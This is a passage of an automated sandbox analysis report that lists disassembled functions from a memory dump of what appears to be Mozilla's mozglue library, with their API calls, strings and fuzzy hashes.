Part of subcall function 6B089B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6B0DB92D), ref: 6B089BC8
Part of subcall function 6B089B80: __Init_thread_footer.LIBCMT ref: 6B089BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6B0803D4,?), ref: 6B0DB955
NtQueryVirtualMemory.NTDLL ref: 6B0DB9A5
NtQueryVirtualMemory.NTDLL ref: 6B0DBA20
RtlNtStatusToDosError.NTDLL ref: 6B0DBA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6B0DBA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6B0DBA86

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: 8b7886fd93deccc25df86a396313cd78ae59e190b7e03f522fe397e15a0b3a85
Instruction ID: 4bad9bbb0669e3adf4002dc961358407b9e19bc204576614ff30145e50439d75
Opcode Fuzzy Hash: 8b7886fd93deccc25df86a396313cd78ae59e190b7e03f522fe397e15a0b3a85
Instruction Fuzzy Hash: 1E514B75E01219DFDF18CFA8D981BDDBFB6AF88314F144169E905B7284DB38AD418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B8AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6B0AFA80: GetCurrentThreadId.KERNEL32 ref: 6B0AFA8D
Part of subcall function 6B0AFA80: AcquireSRWLockExclusive.KERNEL32(6B0FF448), ref: 6B0AFA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6B0D1563), ref: 6B0B8BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6B0D1563), ref: 6B0B8C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6B0D1563), ref: 6B0B8C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6B0D1563), ref: 6B0B8CBA
free.MOZGLUE(?), ref: 6B0B8CCF

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: f9c932c6b677490d34b9e7280062a149b25e11b87bc579a61f560f1de960e297
Instruction ID: 35df320fba45c101c4e3a5fa6771ab3030a6eac61739e88e7711138107ee17d0
Opcode Fuzzy Hash: f9c932c6b677490d34b9e7280062a149b25e11b87bc579a61f560f1de960e297
Instruction Fuzzy Hash: 72718E75A14B018FD708CF29C48071ABBF1FF99314F459A9DE9899B362E775E880CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6B07F280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6B07F2B4
GetProcAddress.KERNEL32(00000000,?), ref: 6B07F2F0
NtQueryVirtualMemory.NTDLL ref: 6B07F308
RtlNtStatusToDosError.NTDLL ref: 6B07F36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6B07F371

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: db6b17b976e297fa0663825b0130c9509c4670725ee0483681753bf35c921b8a
Instruction ID: 3027a16227c55e2d88d48a47ff430957b8137c5d986ae7c5ed28b3a6777258f3
Opcode Fuzzy Hash: db6b17b976e297fa0663825b0130c9509c4670725ee0483681753bf35c921b8a
Instruction Fuzzy Hash: BC218170A00288EFEB38AA60DD95BEEBFFCBB45358F004279E52096190D7789984C775

Uniqueness

Uniqueness Score: -1.00%

Function 6B0E53C8 Relevance: 6.6, APIs: 5, Instructions: 310COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6B0E86AE

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction ID: a4a4de2ce07d8e257b59f1db9ba45e76985287c09fe8e1c691cf953ac9ec953a
Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction Fuzzy Hash: 22C1B976E0011A8FDB18CF68CC91BDDBBB2EF85314F1502A9C549EB355D734A986CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6B0E50C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6B0E8E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6B0E925C

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: 4f627bfe83f9815e171768cbce67b56c0ec35c9913e48d12e47674b8ba1ccf34
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: DAA1D776E002168FDB18CF68CC817DDBBB2AF85314F1502B9C949DB395D734A996CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DB700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6B0DB720
RtlNtStatusToDosError.NTDLL ref: 6B0DB75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6B0AFE3F,00000000,00000000,?,?,00000000,?,6B0AFE3F), ref: 6B0DB760

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 91c0a721990e6d101b69d93d323eddf9a5daa862cecbe66a6be458a95fb989f1
Instruction ID: 99a726929385d95446c5fb960c65a349920fdc6d9d962e7c1def1d1083a6f543
Opcode Fuzzy Hash: 91c0a721990e6d101b69d93d323eddf9a5daa862cecbe66a6be458a95fb989f1
Instruction Fuzzy Hash: 56F0AFB0A0430CAFEF199AA0CC85BEE7FBD9B04319F008169E511620C0D77995C8C661

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6B0803D4,?), ref: 6B0DB955
NtQueryVirtualMemory.NTDLL ref: 6B0DB9A5

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: 39bebf65eab5bc9235cf3acfbc18d6fa50f0de3d3cda9632356a6a9fd5867864
Instruction ID: 5064afb9b2adbd6878eeb7c5fe43d02bf7221d1d3c8f139007fb909d7c6baaa7
Opcode Fuzzy Hash: 39bebf65eab5bc9235cf3acfbc18d6fa50f0de3d3cda9632356a6a9fd5867864
Instruction Fuzzy Hash: 5F41B171E003199FDF08CFA8D891BDEBFB6EF88314F10816AE905A7344DB35A8458B90

Uniqueness

Uniqueness Score: -1.00%

Function 6B0819A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6B0FF760), ref: 6B0819BD
GetCurrentProcess.KERNEL32 ref: 6B0819E5
GetLastError.KERNEL32 ref: 6B081A27
moz_xmalloc.MOZGLUE(?), ref: 6B081A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6B081A4F
GetLastError.KERNEL32 ref: 6B081A92
moz_xmalloc.MOZGLUE(?), ref: 6B081AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6B081ABA
LocalFree.KERNEL32(?), ref: 6B081C69
free.MOZGLUE(?), ref: 6B081C8F
free.MOZGLUE(?), ref: 6B081C9D
CloseHandle.KERNEL32(?), ref: 6B081CAE
ReleaseSRWLockExclusive.KERNEL32(6B0FF760), ref: 6B081D52
GetLastError.KERNEL32 ref: 6B081DA5
GetLastError.KERNEL32 ref: 6B081DFB
GetLastError.KERNEL32 ref: 6B081E49
GetLastError.KERNEL32 ref: 6B081E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B081E9B

Part of subcall function 6B082070: LoadLibraryW.KERNEL32(combase.dll,6B081C5F), ref: 6B0820AE
Part of subcall function 6B082070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6B0820CD
Part of subcall function 6B082070: __Init_thread_footer.LIBCMT ref: 6B0820E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6B081F15
VerSetConditionMask.NTDLL ref: 6B081F46
VerSetConditionMask.NTDLL ref: 6B081F52
VerSetConditionMask.NTDLL ref: 6B081F59
VerSetConditionMask.NTDLL ref: 6B081F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6B081F6D

Strings

D, xrefs: 6B081B57

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: 4df52d7170dea7143475ec35f375cb14ec2a586ca00347f583e9c78af49b7f5a
Instruction ID: 2da50e06035ee1d550fa5f8d3d832da3273e9f516c311afbc8fd2fd87915d3bc
Opcode Fuzzy Hash: 4df52d7170dea7143475ec35f375cb14ec2a586ca00347f583e9c78af49b7f5a
Instruction Fuzzy Hash: 83F15E71A00325AFEB249F65DC48B9ABFB9FF49704F014199E919A7240D778DA80CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6B09BB80 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 388stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(00000000,0000002E), ref: 6B09BC5A
strchr.VCRUNTIME140(00000001,0000002E), ref: 6B09BC6E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6B09BC9E
memset.VCRUNTIME140(?,00000000,00000110), ref: 6B09BE33
VerSetConditionMask.NTDLL ref: 6B09BE65
VerSetConditionMask.NTDLL ref: 6B09BE71
VerSetConditionMask.NTDLL ref: 6B09BE7D
VerSetConditionMask.NTDLL ref: 6B09BE89
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6B09BE97
memset.VCRUNTIME140(?,00000000,00000110), ref: 6B09BEE4
VerSetConditionMask.NTDLL ref: 6B09BF15
VerSetConditionMask.NTDLL ref: 6B09BF21
VerSetConditionMask.NTDLL ref: 6B09BF2D
VerSetConditionMask.NTDLL ref: 6B09BF39
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6B09BF47

Part of subcall function 6B0DAAE0: GetCurrentThreadId.KERNEL32 ref: 6B0DAAF8
Part of subcall function 6B0DAAE0: EnterCriticalSection.KERNEL32(6B0FF770,?,6B09BF9F), ref: 6B0DAB08
Part of subcall function 6B0DAAE0: LeaveCriticalSection.KERNEL32(6B0FF770,?,?,?,?,?,?,?,?,6B09BF9F), ref: 6B0DAB6B

free.MOZGLUE(00000000), ref: 6B09BFF0
_strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6B09C014

Part of subcall function 6B0DAC20: CreateFileW.KERNEL32 ref: 6B0DAC52
Part of subcall function 6B0DAC20: CreateFileMappingW.KERNEL32 ref: 6B0DAC7D
Part of subcall function 6B0DAC20: GetSystemInfo.KERNEL32 ref: 6B0DAC98
Part of subcall function 6B0DAC20: MapViewOfFile.KERNEL32 ref: 6B0DACB0
Part of subcall function 6B0DAC20: GetSystemInfo.KERNEL32 ref: 6B0DACCD
Part of subcall function 6B0DAC20: MapViewOfFile.KERNEL32 ref: 6B0DAD05
Part of subcall function 6B0DAC20: UnmapViewOfFile.KERNEL32 ref: 6B0DAD1C
Part of subcall function 6B0DAC20: CloseHandle.KERNEL32 ref: 6B0DAD28
Part of subcall function 6B0DAC20: UnmapViewOfFile.KERNEL32 ref: 6B0DAD37
Part of subcall function 6B0DAC20: CloseHandle.KERNEL32 ref: 6B0DAD43

Part of subcall function 6B0DAE70: GetCurrentThreadId.KERNEL32 ref: 6B0DAE85
Part of subcall function 6B0DAE70: EnterCriticalSection.KERNEL32(6B0FF770,?,6B09C034), ref: 6B0DAE96
Part of subcall function 6B0DAE70: LeaveCriticalSection.KERNEL32(6B0FF770,?,?,?,?,6B09C034), ref: 6B0DAEBD

Strings

LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6B09BDDD
LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6B09BFCF
accelerator.dll, xrefs: 6B09BC8E, 6B09BC9D
LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6B09BF5B

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
API String ID: 3889411031-3373514183
Opcode ID: 758904fb4c73b2817afb8a89c512c65e544b4c71e81403404585983e5ee64f9c
Instruction ID: b76389fdb6ba3e1691f1396a7725a4c4d587210e067a199d1d2ce693a18cc45e
Opcode Fuzzy Hash: 758904fb4c73b2817afb8a89c512c65e544b4c71e81403404585983e5ee64f9c
Instruction Fuzzy Hash: 94E12B71A043009FE718EF24E885B6EBFE9EF85764F00491DE99587280EB78E845D792

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BE8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6B0B7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6B0BB9F1,?), ref: 6B0B7107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6B0BDCF5), ref: 6B0BE92D
GetCurrentThreadId.KERNEL32 ref: 6B0BEA4F
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEA5C
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEA80
GetCurrentThreadId.KERNEL32 ref: 6B0BEA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6B0BDCF5), ref: 6B0BEA92
GetCurrentThreadId.KERNEL32 ref: 6B0BEB11
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6B0BEB3C
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEB5B

Part of subcall function 6B0B5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6B0BEB71), ref: 6B0B57AB

Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA

Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F

GetCurrentThreadId.KERNEL32 ref: 6B0BEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6B0BEBAC

Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508

GetCurrentThreadId.KERNEL32 ref: 6B0BEBC1
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8,?,?,00000000), ref: 6B0BEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6B0BEBE5
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8,00000000), ref: 6B0BEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6B0BEC46
CloseHandle.KERNEL32(?), ref: 6B0BEC55
free.MOZGLUE(00000000), ref: 6B0BEC5C

Strings

[I %d/%d] profiler_start, xrefs: 6B0BEBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6B0BEA9B

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: 3cf248147a46f4d608927e8f997b8a4982386d01aa3458f91a5d8c0525475440
Instruction ID: 1c9b475443dafa0f702fe50809646d4cf3e3ab97d2c2b935ef2d1ad405b72fc4
Opcode Fuzzy Hash: 3cf248147a46f4d608927e8f997b8a4982386d01aa3458f91a5d8c0525475440
Instruction Fuzzy Hash: 5AA1F631B002049FDB189F68E884B6A7FEEFF86314F104469ED1A87341DB7AE845CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6B084180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6B084196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6B0841F1
VerSetConditionMask.NTDLL ref: 6B084223
VerSetConditionMask.NTDLL ref: 6B08422A
VerSetConditionMask.NTDLL ref: 6B084231
VerSetConditionMask.NTDLL ref: 6B084238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6B084245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6B084263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6B08427A
FreeLibrary.KERNEL32(?), ref: 6B084299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6B0842C4
VerSetConditionMask.NTDLL ref: 6B0842F6
VerSetConditionMask.NTDLL ref: 6B084302
VerSetConditionMask.NTDLL ref: 6B084309
VerSetConditionMask.NTDLL ref: 6B084310
VerSetConditionMask.NTDLL ref: 6B084317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6B084324

Strings

SetProcessDpiAwareness, xrefs: 6B084274
Shcore.dll, xrefs: 6B08425E

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 04e72946390a67e398569b4272979b29dc2e442c21f9d9fd83f96b64e0f3f51f
Instruction ID: c00c226b0a489882a1d048f63176d7bead5d01f988bf619445a299dc4b0aad30
Opcode Fuzzy Hash: 04e72946390a67e398569b4272979b29dc2e442c21f9d9fd83f96b64e0f3f51f
Instruction Fuzzy Hash: C151E271A442247BEF186B749C49FAEBFADEF86B50F014518F9059B1C0DB78DE40CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 6B0AD010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6B0FE804), ref: 6B0AD047
GetSystemInfo.KERNEL32(?), ref: 6B0AD093
__Init_thread_footer.LIBCMT ref: 6B0AD0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6B0FE810,00000040), ref: 6B0AD0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FE7B8,00001388), ref: 6B0AD147
InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FE744,00001388), ref: 6B0AD162
InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FE784,00001388), ref: 6B0AD18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FE7DC,00001388), ref: 6B0AD1B1

Strings

: (malloc) Unsupported character in malloc options: ', xrefs: 6B0AD322
Compile-time page size does not divide the runtime one., xrefs: 6B0AD26D
MALLOC_OPTIONS, xrefs: 6B0AD0CB
<jemalloc>, xrefs: 6B0AD268, 6B0AD311
MOZ_CRASH(), xrefs: 6B0AD277

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
